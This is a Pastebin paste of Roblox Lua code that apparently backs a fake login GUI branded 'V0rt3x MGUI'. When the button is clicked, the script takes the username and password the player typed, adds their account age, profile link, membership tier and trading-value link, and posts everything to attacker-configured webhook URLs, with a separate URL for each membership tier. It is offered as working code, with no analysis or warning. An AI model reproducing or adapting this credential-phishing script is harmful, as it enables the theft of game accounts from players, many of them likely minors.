Gostrondude

Untitled

Jul 21st, 2018
393
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.82 KB | None | 0 0
  1. local stuff = game.Workspace["SETTINGS_WEBHOOK"]
  2.  
  3. local http = game:GetService('HttpService')
  4.  
  5.  
  6. script.Parent.MouseButton1Down:connect(function()
  7. local ifnbc = {
  8. ['username'] = 'V0rt3x MGUI NBC',
  9. ['content'] = "```NEW ACCOUNT! \n USERNAME: "..script.Parent.Parent.username.Text .." \n PASSWORD: "..script.Parent.Parent.password.Text.." \n AGE: "..game.Players.LocalPlayer.AccountAge.." \n PROFILE: ".."https://www.roblox.com/users/"..game.Players.LocalPlayer.UserId.."/profile".. "\n MEMBERSHIP TYPE: NBC \n RAP: ".."https://rbx.rocks/user/"..game.Players.LocalPlayer.Name.. " ```"
  10.  
  11.  
  12.  
  13.  
  14.  
  15. }
  16.  
  17. local ifbc = {
  18.  
  19.  
  20.  
  21.  
  22. ['username'] = 'V0rt3x MGUI BC',
  23. ['content'] = "```NEW ACCOUNT! \n USERNAME: "..script.Parent.Parent.username.Text .." \n PASSWORD: "..script.Parent.Parent.password.Text.." \n AGE: "..game.Players.LocalPlayer.AccountAge.." \n PROFILE: ".."https://www.roblox.com/users/"..game.Players.LocalPlayer.UserId.."/profile".. "\n MEMBERSHIP TYPE: BC \n RAP: ".."https://rbx.rocks/user/"..game.Players.LocalPlayer.Name.. " ```"
  24.  
  25.  
  26.  
  27.  
  28.  
  29. }
  30.  
  31.  
  32. local iftbc = {
  33.  
  34.  
  35. ['username'] = 'V0rt3x MGUI TBC',
  36. ['content'] = "```NEW ACCOUNT! \n USERNAME: "..script.Parent.Parent.username.Text .." \n PASSWORD: "..script.Parent.Parent.password.Text.." \n AGE: "..game.Players.LocalPlayer.AccountAge.." \n PROFILE: ".."https://www.roblox.com/users/"..game.Players.LocalPlayer.UserId.."/profile".. "\n MEMBERSHIP TYPE: TBC \n RAP: ".."https://rbx.rocks/user/"..game.Players.LocalPlayer.Name.. " ```"
  37.  
  38.  
  39.  
  40.  
  41. }
  42.  
  43.  
  44.  
  45.  
  46. local ifobc = {
  47.  
  48. ['username'] = 'V0rt3x MGUI OBC',
  49. ['content'] = "```NEW ACCOUNT! \n USERNAME: "..script.Parent.Parent.username.Text .." \n PASSWORD: "..script.Parent.Parent.password.Text.." \n AGE: "..game.Players.LocalPlayer.AccountAge.." \n PROFILE: ".."https://www.roblox.com/users/"..game.Players.LocalPlayer.UserId.."/profile".. "\n MEMBERSHIP TYPE: OBC \n RAP: ".."https://rbx.rocks/user/"..game.Players.LocalPlayer.Name.. " ```"
  50.  
  51.  
  52.  
  53. }
  54.  
  55.  
  56.  
  57.  
  58. local newnbc = http:JSONEncode(ifnbc)
  59. local newbc = http:JSONEncode(ifbc)
  60. local newtbc = http:JSONEncode(iftbc)
  61. local newobc = http:JSONEncode(ifobc)
  62.  
  63.  
  64.  
  65. if game.Players.LocalPlayer.MembershipType == Enum.MembershipType.None then
  66.  
  67. http:PostAsync(stuff.NBC.Value, newnbc)
  68.  
  69. else
  70.  
  71.  
  72. if game.Players.LocalPlayer.MembershipType == Enum.MembershipType.BuildersClub then
  73.  
  74. http:PostAsync(stuff.BC.Value, newbc)
  75.  
  76.  
  77.  
  78. else
  79. if game.Players.LocalPlayer.MembershipType == Enum.MembershipType.TurboBuildersClub then
  80.  
  81. http:PostAsync(stuff.TBC.Value, newtbc)
  82.  
  83.  
  84.  
  85.  
  86. else
  87.  
  88.  
  89. if game.Players.LocalPlayer.MembershipType == Enum.MembershipType.OutrageousBuildersClub then
  90.  
  91. http:PostAsync(stuff.OBC.Value, newobc)
  92.  
  93. end
  94.  
  95.  
  96. end
  97.  
  98.  
  99. end
  100.  
  101. end
  102.  
  103.  
  104.  
  105. end)
Advertisement
Add Comment
Please, Sign In to add comment